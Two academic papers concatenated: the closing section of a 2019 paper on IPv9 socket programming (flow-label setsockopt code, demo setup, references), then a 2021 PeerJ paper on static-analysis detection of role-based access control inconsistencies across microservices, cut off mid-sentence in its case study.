IPV9_FL_S_EXCL； freq.flr_flags = IPV9_FL_F_CREATE； freq.flr_expires = 0； freq.flr_linger = 0； freq.__flr_pad = 0； setsockopt(s, IPPROTO_IPV9, IPV9_FLOWINFO_SEND, &on, sizeof(int))； setsockopt(s, IPPROTO_IPV9, IPV9_FLOWINFO, &on, sizeof(int))； setsockopt(s, IPPROTO_IPV9, IPV9_FLOWLABEL_MGR, &freq, sizeof(structin9_flowlabel_req)); The above code sets the stream label of socket s to 0000f, where the destination address of the stream label is defined in dst_addr. Structure in9 flowlabelreq is defined as follows struct in9_flowlabel_req{ struct in9_addrflr_dst； __u32 flr_label； __u8 flr_action； __u8 flr_share； __u16 flr_flags； __u16 flr_expires； __u16 flr_linger； International Journal of Advanced Network, Monitoring and Controls Volume 04, No.04, 2019 63 __u32 __flr_pad； }； 4) Returned value 0 is returned on success, -1 is returned on error, and errno represents the error type value. III. IPV9 DEVELOPMENT INSTRUCTION 1) Development environment Centos7 operating system with Linux operating environment with IPv9 kernel; VMware virtual machine image:: Centos7_ IPv9_ dev_vm. The compiled program copy in Centos7_IPv9_dev_vm virtual machine image, it can run normally, provides the virtual machine application development and compilation environment, C language headers file and IPv9_Linux kernel. 2) IPv9 network application development directory: /develop9 Development document directory: /develop9/docs The demo directory: /develop9/test9 demo README /develop9/test9/README 3) Test9 program The test9 program mainly changes the socket family program file. cd /develop9/test9 make 4) Demo operation #Configure the IPv9 address ifconfig9 eth1 add 32768[86[21[4]10001 #Start the IPv9 server program: /test9_tcpserver #Start the IPv9 client program: /test9_tcpcli 32768[86[21[4]10001 Verify the caught: tcpdump -s 0 -i any -w t.cap, or wireshark with ipv9 plugin open t.cap. IV. CONCLUSION This paper introduces the commonly used socket able and interface functions, including creating a socket, binding function, link function, monitoring function and accept function, read the function and writing function, etc., each function is connected the header files, prototyping, description, and the return value, these are the basis of network programming, mastering these functions, which plays a major role for application development. REFERENCES [1] https://zh.wikipedia.org/wiki/Berkeley%E5%A5%97%E6%8E%A5% E5%AD%97, Wikipedia: Berkeley sockets 2011-02-18, (Goodheart 1994, p. 11), (Goodheart 1994, p. 17) [2] Cisco Networking Academy Program, CCNA 1 and 2 Companion Guide Revised [3] Third Edition, P.480, ISBN 1-58713-150-1 [4] Jack Wallen (2019-01-22). "An Introduction to the ss Command". [5] V. S. Bagad, I. A. Dhotre (2008), Computer Networks (5th revised edition, 2010 ed.), Technical Publications Pune, p. 52 [6] Ian Griffiths for IanG on Tap. 12 August, 2004. Raw Sockets Gone in XP [7] "raw(7): IPv4 raw sockets - Linux man page". die.net. [8] "Raw IP Networking FAQ". faqs.org. [9] www-306.ibm.com - AnyNet Guide to Sockets over SNA [10] books.google.com - UNIX Network Programming: The sockets networking API [11] books.google.com - Designing BSD Rootkits: An Introduction to Kernel Hacking [12] historyofcomputercommunications.info - Book: 9.8 TCP/IP and XNS 1981 - 1983 [13] mit.edu - The Desktop Computer as a Network Participant.pdf 1985 work_phbri3nemnevfl2hhtmkl4bl3u ---- peerj-cs-376 1..24 On automated RBAC assessment by constructing a centralized perspective for microservice mesh Dipta Das1, Andrew Walker1, Vincent Bushong1, Jan Svacina1, Tomas Cerny1 and Vashek Matyas2 1 Department of Computer Science, Baylor University, Waco, TX, USA 2 Faculty of Informatics, Masaryk University, Brno, Czech Republic ABSTRACT It is important in software development to enforce proper restrictions on protected services and resources. Typically software services can be accessed through REST API endpoints where restrictions can be applied using the Role-Based Access Control (RBAC) model. However, RBAC policies can be inconsistent across services, and they require proper assessment. Currently, developers use penetration testing, which is a costly and cumbersome process for a large number of APIs. In addition, modern applications are split into individual microservices and lack a unified view in order to carry out automated RBAC assessment. Often, the process of constructing a centralized perspective of an application is done using Systematic Architecture Reconstruction (SAR). This article presents a novel approach to automated SAR to construct a centralized perspective for a microservice mesh based on their REST communication pattern. We utilize the generated views from SAR to propose an automated way to find RBAC inconsistencies. Subjects Security and Privacy, Software Engineering Keywords Microservices, REST, RBAC, Access control, Authorization, Security, Static code analysis, Systematic architecture reconstruction INTRODUCTION With the software industry’s growth, the complexity of security administration is becoming more and more challenging. As the current software development trend is moving rapidly from monolithic to MicroService Architecture (MSA), we must address communication patterns not only for the simple client to server scenarios but also for service to service scenarios. Since the client-server communication pattern has existed for many years, its security implications have already been well addressed. In contrast, not much has been studied for service-to-service communication patterns. Currently, the most popular way to establish communication between services is to use Representational State Transfer (REST) (Vural, Koyuncu & Guney, 2017; Salah et al., 2016). Developing a secured REST-based infrastructure is relatively easy for a smaller number of microservices. However, the security aspects gradually become more complex as the number of microservices grows. Due to their high feature set and operational complexity, modern microservice-based applications tend to have a large number of individual microservices developed separately by separate teams. Enforcing a robust security solution for such applications is tedious for developers and might lead to security How to cite this article Das D, Walker A, Bushong V, Svacina J, Cerny T, Matyas V. 2021. On automated RBAC assessment by constructing a centralized perspective for microservice mesh. PeerJ Comput. Sci. 7:e376 DOI 10.7717/peerj-cs.376 Submitted 18 August 2020 Accepted 6 January 2021 Published 1 February 2021 Corresponding authors Tomas Cerny, tomas_cerny@baylor.edu Dipta Das, dipta_das1@baylor.edu Academic editor Mario Luca Bernardi Additional Information and Declarations can be found on page 20 DOI 10.7717/peerj-cs.376 Copyright 2021 Das et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.376 mailto:tomas_cerny@�baylor.�edu mailto:dipta_das1@�baylor.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.376 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ disagreement among microservices. This is because individual developers only have an idea of a subset of microservices they maintain but lack an understanding of the overall picture. Even system architects may not understand the complete picture of the application since many of those microservices may not be in the initial blueprint of the application but rather were added later. Thus, we need to establish an automatic way to generate the overall communication pattern for the whole application before diving into the security aspects. This is done through a process of Systematic Architecture Reconstruction (SAR) in which overall views are constructed from existing application artifacts. SAR is divided into four phases: extraction, construction, manipulation and analysis. In this article, we first introduce a solution for automatic SAR of a microservice application, which generates a view of the microservices’ REST communication pattern. By automating the first three phases of SAR and utilizing the constructed views, we can focus on the analysis phase and present an approach to enumerate possible security loopholes in the application. More specifically, we focused on finding Role-Based Access Control (RBAC) inconsistencies among microservices using static code analysis. We present a case study on a single enterprise application called Teacher Management System (TMS) consisting of four individual microservices. This application was developed separately but re-purposed here as a testbed for performing static code analysis. Our work focuses on intra-and inter-microservice inconsistencies highlighting all possible RBAC issues. An application’s core security requirement is to ensure that it can only be used by legitimate users (Mohanty, Mohanty & Balakrishnan, 2016). RBAC is one of the popular methods of securing REST services where each user of the application is assigned to a set of roles that grant access to different parts of the system. In microservice-based applications, there can be two different abstractions to enforce RBAC rules. First, centralized among all the microservices and, second, per microservice-based. Thus, next in this article, we focus on the centralized approach. Finding inconsistencies among RBAC rules in a large system is a cumbersome and difficult task due to different levels of abstractions, poor coding practices, and coupling with third-party services. According to a survey conducted in 2014 by the International Data Group (Mohanty, Mohanty & Balakrishnan, 2016), about 63% of applications have not been tested for security vulnerabilities. This can be easily mitigated by enforcing standard security features during the regular software development process (McGraw, 2004). Ignoring such security vulnerabilities is expensive. Security breaches can cost companies billions and require significant time and effort to resolve. For example, the 2014 eBay hack, which was caused by improper access control restrictions, impacted over 145 million users (Swinhoe, 2020). Being able to list possible security vulnerabilities automatically can significantly reduce the likelihood of such incidents. System administrators should wisely choose the approaches to test the security vulnerability of the system. The most accurate outcome from such a test can be obtained via rigorous penetration testing. However, such an approach needs the application to be fully deployed, and running penetration tests against a production deployment could Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 2/24 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ lead to disruption for end users. Also, it is difficult to emulate all possible scenarios for penetration testing. In contrast, static code analysis can be a much easier alternative that does not require an application to be deployed and hence is more cost-effective. Although static code analysis is no panacea, when carefully implemented, it can detect many vulnerabilities. It is for these reasons we use static code analysis for our automated SAR process. The article is organized as follows. Section two discusses the related work and state of the art. “Proposed Method” describes our proposed method in detail, and section four explores a case study. Finally, we conclude our article by summarizing our work outcomes, describing our future goals, and listing the references. Throughout the article, the terms “inconsistency”, “violation” and “issue” are used interchangeably to indicate a potential flaw. RELATED WORK In this section, we present related work from the two different perspectives considered in this article. First, we assess the limitations of RBAC analysis in the context of enterprise systems. Next, we assess existing approaches for the SAR. Role-based access control In microservice-based applications, each microservice implements a subset of features. End-users or other microservices can access these features through an application programming interface (API). There are typically two main API development choices: REST and Simple Object Access Protocol (SOAP) (Tihomirovs & Grabis, 2016). While REST is an architecture for API development that works over standard HTTP protocol, SOAP is just a protocol. For many years, SOAP was a standard approach for web service interfaces. However, it has been dominated by REST in recent years. According to Stormpath, over 70% of public APIs are designed using REST (Hunsaker, 2015). The main advantage of REST compared to SOAP is its simplicity and ease of learning. REST is lightweight and hence better suited for a wide range of devices, including mobile devices (Wagh & Thool, 2012). Apart from that, REST uses JavaScript Object Notation format which is faster to parse compare to Extensible Markup Language used in SOAP (Tihomirovs & Grabis, 2016; Castillo et al., 2011). Securing REST API endpoints is generally easy when existing HTTP security approaches are leveraged instead of implementing a new security model (Sudhakar, 2011). Securing REST endpoints involves both authentication and authorization (Brachmann, Dittmann & Schubert, 2012). Authentication is the process of verifying the credentials associated with a particular request. Different enterprise applications use different strategies to authenticate incoming requests, such as basic authentication, token-based authentication, hash-based digest authentication, OAuth, etc. (Lee, Jo & Kim, 2015). On the other hand, authorization involves verifying whether a request connection is allowed to perform a particular action through a REST endpoint. Mandatory access control, discretionary access control, attribute-based access control and RBAC are popular approaches for enforcing authorization (Sandhu & Samarati, 1994). In this article, instead Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 3/24 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ of authentication breaches, we focus on exploring and detecting possible authorization inconsistencies, specifically role-based authorization inconsistencies. Role-Based Access Control has been widely adopted as an alternative to classical discretionary and mandatory access controls because of its advancement in flexibility and detail of control (Sandhu & Samarati, 1994; Sandhu et al., 1996). It regulates users’ access to information and system resources based on activities that users need to execute in the system and requires the identification of roles in the system (Ahn & Sandhu, 2000). RBAC’s administrative capabilities have made it stand out from the alternative approaches because system administrators can statically or dynamically regulate user’s access by defining roles, role hierarchies, relationships, and constraints (Ferraiolo, Cugini & Kuhn, 1995). For distributed systems, another advantage is that RBAC administrative responsibilities can be divided into central and local protection domains (Ferraiolo, Cugini & Kuhn, 1995). In the case of microservice-based applications, these can be translated into central policies for all associated microservices and per microservice- based policies. Central RBAC policies can be enforced by delegating authentication and authorization tasks to a separate identity management tool, such as Red Hat’s Keycloak (Red Hat Inc, 2020a). On the other hand, individual microservices can carry out such policies using security features of underlying frameworks, such as spring-security for spring-based applications (Scarioni & Nardone, 2019). Due to the high impact of security-related issues, much research and development have been done addressing role violations. Ciuciu, Tang & Meersman (2012) described one such strategy where appropriate security annotations are recommended for developers based on the ontology extracted from the business information. However, since this recommendation strategy works only based on business information irrespective of source code, if the business information provided is flawed, then the recommendation will also be faulty. One similar study focused on finding security vulnerabilities of API implementations among different libraries based on security-sensitive events (Srivastava et al., 2011). It finds discrepancies among security policies associated with the same API using a flow graph. The inherent drawback of this approach is that it requires multiple independent implementations of the same API, and it can not find which ones of whose multiple implementations are faulty. Another research study described a model-based approach for testing access control rules based on consistency, completeness and redundancy (Xu et al., 2012). It checks whether access control rules are consistent across the methods, whether they are unnecessarily repeated, and whether they covered all subset of permissions. However, the coverage of access control rules over a set of methods does not necessarily relate to security issues. In Xu et al. (2012), the system under study does not allow a user to rent a book on maintenance due to the incompleteness of access control rules, which is more of a system flaw rather than a security issue. In contrast, our proposed method finds whether a user can access a resource-restricted by one RBAC rule through an alternative path that has less restriction. The tool FixMeUp (Son, Mckinley & Shmatikov, 2013) proposed an automated way to fix access control issues in PHP applications using static code analysis. It automatically Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 4/24 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ edits the source code to resolve access control issues. Although it seems compelling to automate the task, it might lead to syntax errors and might result in unintended consequences in case of false positives. On the other hand, our RBAC tool pinpoints the location of possible inconsistencies in the source code without adversely affecting the codebase since it does not modify the source code while performing analysis. The most similar analysis to our proposed method has been described by Walker et al. (2020). That tool performs static code analysis on enterprise JAVA applications to find issues in RBAC rules defined using security annotations. The key difference is that it only considers intra-microservice issues, while our method works for both intra- and inter- microservice issues, taking into account all the microservices that constitute the application. Freudenthal et al. (2002) proposed a distributed RBAC (dRBAC) mechanism that decentralizes the trust-management across multiple administrative domains. Due to its distributive nature dRBAC is highly scalable for a large number of mutually anonymous users. It features third-party delegation that enables one authorized entity to entrust roles created by another entity. Besides, it controls the access levels for the same resource by valued attributes. Also, dRBAC presents continuous monitoring by utilizing a pub-sub model to ensure the validity of trust relationships for extended interactions. In this article we do not assess such decentralized RBAC techniques, rather we assume that the user authentication and role mapping are handled through a centralized service while individual microservices are responsible for the imposition of those roles on API endpoints. Separation of Duties (SoD) has been widely studied in the context of RBAC. It ensures data integrity and fraud prevention by distributing critical tasks among multiple users (Basin, Burri & Karjoth, 2009). It enforces that no single user can execute all actions and thus any kind of fraudulent activity will cause collision among at least two users (Habib et al., 2014). In RBAC, SoD can either static or dynamic (Sandhu, 1990). In the static separation of duties (SSD) constraints are enforced during the assignment of users to roles. On the other hand, in dynamic separation of duties (DSD) constraints are activated on the roles within a user session (Omicini, Ricci & Viroli, 2005). In this article, we are not considering the user assignments and user sessions. Instead, we performed static code analysis that solely focused on a subset of SSD including statically defined roles and role hierarchies. Software architecture reconstruction Although many studies address access control issues, most of them are focused on single microservice or monolith applications. However, modern cloud-based applications are commonly designed as a set of microservices for better flexibility and scalability (Salah et al., 2016). The key challenge to perform a holistic analysis across multiple microservices is the automated construction of the application’s centralized perspective. SAR extracts a representation of software architecture from source code or documentation through an iterative reverse engineering process (Bass, Clements & Kazman, 2003). Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 5/24 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ It is historically defined with four phases: extraction, construction, manipulation and analysis (Bass, Clements & Kazman, 2003). In the extraction phase, all necessary artifacts are collected. Each set of related artifacts is relevant to a view that represents relations among certain elements of the software architecture (Bass, Clements & Kazman, 2003). The construction phase creates canonical representations of the views. Then the manipulation phase combines the views to create a more compact representation to answer specific questions in the analysis phase. Lastly, the analysis phase answers specific research questions from the reconstructed views. In this article, the analysis phase addresses the detection of possible RBAC inconsistencies. Also, to the best of our knowledge SAR has not been used to detect RBAC inconsistencies in MSA. One approach of SAR of microservice-based systems is described by Rademacher, Sachweh & Zündorf (2020). This method describes different modeling based on different viewpoints (Rademacher et al., 2020) where domain modeling is based on bounded context, services modeling is based on REST calls, and operation modeling is based on deployment specifications, for example, Dockerfiles. The Model-Driven Engineering (MDE) approach is commonly used in SAR. In MDE, models are used as first-class entities to depict an efficient representation of the software architecture (Cicchetti et al., 2013). Alshuqayran, Ali & Evans (2018) described a manual analysis through the MDE approach to reconstruct the architecture of microservice-based open-source projects. They defined a metamodel which is then mapped to the architecture using mapping rules. The metamodel and mapping rules are initially created for one system and then refined and validated using seven additional systems. However, the authors did not apply their reconstruction strategy to answer specific questions. Ibrahim, Bozhinoski & Pretschner (2019) proposes an approach to derive MSA module topology from container-based deployment configuration files, more specifically, from Docker Compose files. In addition to topology, they extracted the attack graph, a directed acyclic graph, to identify attack paths that lead to vulnerability exploitation. Their implementation is based on a open-source vulnerability scanner for Docker containers named Clair (Quay, 2020). The MicroART tool described by Granchelli et al. (2017) extracts the deployment architecture of a microservice-based system from the source code repository. It utilizes a domain-specific language to represent key elements of the architecture by using the MDE approach. It employs runtime log analysis to discover containers, network interfaces, and service interactions. However, users need to provide a reference to the container engine since MicroART does not automatically detect it from deployment configuration files. Our proposed method reconstructs MSA architecture based on the REST communication pattern, similar to the service modeling described by Rademacher, Sachweh & Zündorf (2020). However, unlike that system, which depends on a Service Modeling Language (Rademacher et al., 2020), our reconstruction is solely based on static code analysis and works independently. Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 6/24 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ PROPOSED METHOD Enterprise applications are typically organized into a three-layer structure: controller layer, service layer, and repository layer. It is also common to organize microservices into the presentation layer, business layer, persistence layer, and database layer (Richards, 2015). These two commonly used structures essentially indicate the same strategy. The presentation layer maps to the controller layer, which defines API endpoints, and the business layer maps to the service layer, which contains business logic. The persistence layer maintains data access objects to interact with the database layer (Alur et al., 2003). These two layers (persistence and database) are consolidated into the repository layer in the three-layer architecture (Richards, 2015; Steinegger et al., 2017). Microservices typically communicate over REST APIs (Salah et al., 2016). Each microservice’s controller layer defines the REST endpoints that serve as request entry points for that particular microservice. Requests are delegated from the controller layer to the service layer. The service layer typically implements business logic. It processes the request and generates an appropriate response. The service layer can also incorporate with the persistence layer to store and retrieve data relevant to a specific request. However, sometimes the service layer depends on other microservices to process the request. In that case, it creates REST calls to other microservices and implements business logic based on the response. This describes a typical REST communication scenario among microservices. In particular, the service layer of one microservice makes REST calls to other microservice’s controller layers to implement its business logic. Thus, the REST endpoints of each microservice can be either accessed by end-users or other microservices. Enterprise frameworks adopted annotation-based configuration to define REST endpoints, for example, @RestController annotation in Spring-based JAVA applications and @app.route annotation in Flask based Python applications (VMware Inc, 2020; Pallets Projects, 2020). Since the REST endpoints are the entry points to the microservice, securing them is the single most important task for the developers. While there are several ways to enforce role-based authorization, the most widely adopted method in enterprise applications is to define authorization realms through the application server (Oberle et al., 2004) or through separate identity management tools like Keycloak (Red Hat Inc, 2020b). A realm is a security policy domain defined in the application server that contains a collection of users (Jendrock et al., 2014). These users might be further organized into several groups (Jendrock et al., 2014). Centralized authorization systems like Keycloak handles user authentication and role mapping. But such systems do not verify whether developers properly enforced RBAC policies during API implementation or not. For example, some API endpoints might have missing RBAC roles. In that case, any authenticated user can access those endpoints. Similarly, two API endpoints with different roles might eventually access the same entity which might be unintentional and left unnoticed. These inconsistencies are not flagged by the centralized authorization system and thus defining authorization policies are not enough to secure the endpoints. Developers need to enforce those policies within the application’s source code that runs in that application server. Designing proper Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 7/24 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ authorization policies are just one part of ensuring robust RBAC enforcement, we need to consider coding problems that might lead to security loopholes. In this article, we focused on detecting such coding problems through static code analysis. Also, it is important to classify these problems to understand the severity and origin of them. We have defined five types of possible inconsistencies or violations: 1. Missing role violations: this type of violation occurs when an API endpoint does not have any roles associated with it. In this case, all authenticated users can access the endpoint. Such violation typically happens when developers forget to enforce authorization roles on an API endpoint. However, it could be false-positive, for example, some API endpoint might be intentionally left open for all users. 2. Unknown access violations: if an API endpoint contains an authorization role that is not present in the user-defined role hierarchy, then we define it as an unknown access violation. Usually this type of violation results from typographical errors and in most cases, such typos are left unnoticed since they do not cause any compilation errors. As a result, legitimate users with proper access are denied from accessing the endpoint. 3. Entity access violations: if input and output that is, request and response types of two API endpoints are similar but they have different authorization roles, then we classify it as an entity access violation. This kind of violation indicates that the same entity is being accessed by users with different access roles. 4. Conflicting hierarchy violations: this type of violation happens when an intermediate method in the service layer or repository layer contains two different roles that are ancestor of each other’s in the role hierarchy. This violation signifies that users with a junior role are accessing some functionalities that might be intended for users with a senior role (Walker et al., 2020). 5. Unrelated access violations: similar to conflicting hierarchy these violations focus on intermediate methods instead of endpoint methods. When an intermediate method contains two multiple roles that are located in different subtrees of the role hierarchy, we classify it as an unrelated access violation. This type of violation indicates poorly separated concerns while distributing access roles across different functionalities of the application (Walker et al., 2020). Like REST configurations, authorization policies are typically applied by annotating methods or functions with appropriate security annotations. These annotations can differ based on the framework used to develop the application; for example, JAX-RS security annotations are used with JAVA EE based application (Oracle, 2020). A similar approach to enforce RBAC using annotation can also be found in Python applications based on the Flask framework (Thio, 2020). These security annotations define the level of restrictions applied to the associated methods or functions. Table 1 highlights the most commonly used security annotations in JAVA EE applications supported by JSR 250 (Mordani, 2016; Oracle, 2020). For example, if we add a @rolesAllowed(ADMIN) annotation to a controller endpoint method, only the users that have the “ADMIN” role (defined in the realms) can access the Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 8/24 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ endpoint. However, since the number of such endpoint methods can be significant and can grow over each iteration of the development cycle, it is possible to introduce inconsistencies among the allowed roles or even missing roles. Moreover, since these inconsistencies and missing roles do not cause any compilation or run time error, it is tempting for developers to overlook them, and that might result in potential security loopholes. Our proposed method analyzes a set of microservice artifacts that communicate with each other through REST calls. It finds potential RBAC violations for the whole microservice mesh by scrapping security metadata of individual microservices and by combining them based on their REST communication flow. We divided the analyzer into three modules: a discovery module, a flow-matcher module, and an analysis module. The discovery module implements the extraction phase of SAR. It collects endpoint specification and security metadata. Next, the flow-matcher module performs the construction and manipulation phases of SAR by resolving the interaction among microservices. Finally, the analysis module completes the analysis phase of SAR and detects potential RBAC violations based on the other two modules’ output. The discovery module performs static code analysis on individual microservice artifacts. It detects the REST endpoints and security roles attached to those endpoints. Apart from that, it also lists the REST calls to other microservices, which are typically implemented in the service layer. The discovery module works for both source code artifacts and bytecode artifacts (e.g., JAR file, Python bytecode) and thus provides generalization for both interpreted languages (e.g., JAVA, Python) and compiled languages (e.g., C++, Go). The source code version of the discovery module takes a microservice artifact as input and parse class definitions while the bytecode version does the same using bytecode analysis. As discussed above, both REST endpoints and security policies are typically defined using the annotation-based configuration in enterprise applications. The descriptions of these annotations are well structured and preserved in the source code and in the bytecode. The discovery module scans each class to find REST annotations and security annotations that define REST endpoints and security roles, respectively. It aggregates class-level annotations with method-level annotations to derive the complete definition of each REST endpoints. It collects the allowed roles, port, path, HTTP type, type of request object, and type of response object for each endpoint. It takes account of all standard HTTP types, with the most commonly used ones being GET, POST, PUT and DELETE. The discovery module then further analyzes service layer classes to detect REST calls to other microservices. For each REST call, it detects the URL, HTTP Table 1 JAVA EE security annotations. Annotation Description @permitAll All security roles are permitted @denyAll No security roles are permitted @rolesAllowed List of permitted security roles Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 9/24 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ type, type of request object, and type of response object. It parses REST client definitions to gather those attributes. However, detecting the URL string involves further intensive analysis since the URL string is usually constructed by performing consecutive append operations in different parts of the source code. For this, our discovery module applies a backward recursive data flow analysis from the point where the URL is used to the point where the URL was initialized. In each intermediate step of the data flow where the URL was referenced, it scans for any append operations and resolves them to restore the final URL. Parts of the URL may also be constructed using values defined in the configuration files instead of hardcoded strings within the source code. Our module also scans configuration files of the project to resolve those values. Finally, the discovery module generates method-call graphs for individual microservices. It takes each controller method as the root node and populates child nodes by traversing subsequent method calls to the service layer and repository layer methods. For each microservice, the discovery module organizes all the scrapped information described above into a usable structure and passes them to the flow matcher module and analysis module. As discussed by Walker et al. (2020), RBAC security analysis for individual microservices is insufficient. It fails to acknowledge violations when an end-user gains access to a normally restricted resource by creating a proxy request through another microservice mediating the resource access through service layer REST calls. To detect such violations, we need to consider the whole MSA mesh instead of a single MSA, and we need to resolve REST communications between them to construct a complete centralized perspective. In our proposed model, the flow matcher module constructs the centralized communication graph for the whole MSA mesh. It takes descriptions of REST-endpoints and REST-calls for each microservice prepared by the discovery module. It combines all the REST endpoints into a list and all the REST calls into another list. Then it performs a brute force matching between those two lists to resolve all REST communications among the microservices. This involves matching the URL (including port and path), HTTP method, request type, and response type. However, it is common for modern microservices to use service discovery and service registry instead of a hardcoded IP address in the URL (Montesi & Weber, 2016). To resolve this, our flow matcher module matches both the IP address and service name and checks if one of them matches. The service name is usually defined in each microservices’ configuration files and scrapped during the discovery phase. The flow matcher module also generates a diagram of REST communication for the whole microservice mesh for better visualization. The analysis module takes descriptions of method-call graphs and allowed roles from the discovery module and REST communication descriptions from the flow matcher module. Additionally, it takes the role hierarchy tree from the user. Figure 1 shows a user-defined role tree passed to the analysis module as input. Roles higher in the hierarchy tree are senior to the roles below in the tree; senior roles should have all the access rights junior roles have, plus additional rights the junior roles do not have. Roles in separate paths of the hierarchy are not related to each other. The analysis module Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 10/24 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ combines method-call graphs of different microservices based on their REST communication. Figure 2 depicts a typical scenario of how combined method-call graphs are constructed. Each node of the combined graphs can be a controller node, service node, or repository node. Typically, only the controller nodes contain RBAC information, that is, a list of allowed roles; however, the service layer and repository layer nodes can also have RBAC information. To find potential RBAC violations in those layers, the analysis module loops through all the nodes and analyzes the roles associated with them. The first three types of violations are only related to controller nodes. If any controller node does not have any roles associated with it, we detect it as a missing role violation. This is the most common type of violation that might occur since missing roles on controller methods do not cause any compilation errors. If a node contains a role that is not defined in the user-provided role hierarchy, we detect it as an unknown access violation. This type of violations typically results from typographical errors. If request types, response types, and HTTP types of two controller methods are equal, but they have different RBAC roles, we detect it as an entity access violation. This violation implies similar access to a particular entity with different roles. The unrelated access and conflicting hierarchy violations occur when a node contains multiple roles after performing the reduction and aggregation. In the reduction phase, the analysis module goes through each node and keeps the lowest role defined in the user-provided role hierarchy. The significance of this reduction is that it defines the minimum role required to access a specific part of the application. After reduction, in the aggregation phase, the analyzer traverses each graph and copies the allowed role from the parent node to the child node. If a child node contains an RBAC role or a child node has multiple parents with different roles, then it aggregates the roles for that particular child node. Figure 3 shows how the analysis module labels each child node using the RBAC roles of its parent nodes according to the role hierarchy shown in Fig. 1. The conflicting hierarchy violation occurs when a node code contains two different roles where one role is an ancestor of another role in the user-defined role hierarchy. This violation indicates a place where a junior role potentially accesses an area reserved for a more senior role. It is only a potential violation because it is ambiguous whether a junior role is accessing an area reserved for a senior role or the senior role is accessing something allowed for the junior role (Walker et al., 2020). The unrelated access violation is the opposite of the conflicting role violation. It happens when a node contains two roles Role S Role QRole P Role CRole BRole A Figure 1 A sample user-defined role hierarchy tree. Senior roles are higher in the tree; in this example, Role S is the most senior role, Role A is senior to B, which is senior to C. Role P is senior to Q. Full-size DOI: 10.7717/peerj-cs.376/fig-1 Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 11/24 http://dx.doi.org/10.7717/peerj-cs.376/fig-1 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ Microservice A controllerMethodA2 serviceMethodA2 Microservice B controllerMethodB1 repositoryMethodB1 GET JAR files Application X Application X controllerMethodA2 serviceMethodA2 controllerMethodB1 serviceMethodB1 repositoryMethodB1 repositoryMethodA1 serviceMethodA1 controllerMethodA1 Microservice A controllerMethodA2 serviceMethodA2 repositoryMethodA1 serviceMethodA1 controllerMethodA1 controllerMethodA1 serviceMethodA1 repositoryMethodA1 Analysis Module Flow Matcher Module Discovery Module serviceMethodB1 Microservice B controllerMethodB1 repositoryMethodB1 serviceMethodB1 Figure 2 Construction of combined method-call graphs. Full-size DOI: 10.7717/peerj-cs.376/fig-2 Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 12/24 http://dx.doi.org/10.7717/peerj-cs.376/fig-2 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ located in a different subtree of the user-defined role tree, that is, one role is not an ancestor of another role. This violation indicates areas where unrelated roles are accessing the same application area, which may indicate poorly separated concerns that could be refactored (Walker et al., 2020). For example, considering the role hierarchy shown in Fig. 1, if a node has roles {A, C} then it is detected as a conflicting hierarchy violation, and if a node has roles {A, P} then it is marked as an unrelated access violation. The categorization of violations defined in our proposed method is mostly similar to the ones discussed by Walker et al. (2020). However, Walker et al. (2020) only considered only a single microservice at a time, whereas we also analyze inconsistencies across microservices. Our system finds potential RBAC violations based on a user-defined role hierarchy for the whole microservice mesh (a set of microservices). It warns the developer about potential violations by providing a report of specific locations where the violations are detected and the categories, as discussed above. While some of the detected violations may be false-positive and intentional, our proposed method provides an overall idea of all possible RBAC violations for a large and complex system. The categorization of the violations helps the developer understand each violation’s severity, while the specific locations of the violations help to find and fix them easily. CASE STUDY The TMS1 is an enterprise application developed at Baylor University for Central Texas Computational Thinking, Coding, and Tinkering to facilitate the Texas Educator controllerMethod01 Roles: {A,B,C} controllerMethod02 Roles: {P,Q} serviceMethod01 serviceMethod02 repositoryMethod01 repositoryMethod02 controllerMethod01 Roles: {C} controllerMethod02 Roles: {Q} serviceMethod01 serviceMethod02 repositoryMethod01 repositoryMethod02 controllerMethod01 Roles: {C} controllerMethod02 Roles: {Q} serviceMethod01 Roles: {C} serviceMethod02 Roles: {Q} repositoryMethod01 Roles: {C,Q} repositoryMethod02 Roles: {Q} reduction aggregation Figure 3 Reduction and aggregation of RBAC roles. Full-size DOI: 10.7717/peerj-cs.376/fig-3 1 https://github.com/cloudhubs/tms2020. Das et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.376 13/24 http://dx.doi.org/10.7717/peerj-cs.376/fig-3 https://github.com/cloudhubs/tms2020 http://dx.doi.org/10.7717/peerj-cs.376 https://peerj.com/computer-science/ Certification training program. The whole TMS system consists of four individual microservices: user management system (UMS), question management system (QMS), exam management system (EMS) and configuration management system (CMS). All of the microservices are developed using the Spring Boot framework (Walls, 2016) and structured into the controller, service, and repository layers. The RBAC authorization is enforced using annotations on each controller method for the individual microservices, while the central authentication and authorization policies are defined using Keycloak (Red Hat Inc, 2020a). Figure 4 shows the role hierarchy tree for the TMS application. For our case study, we added mutants (Jia & 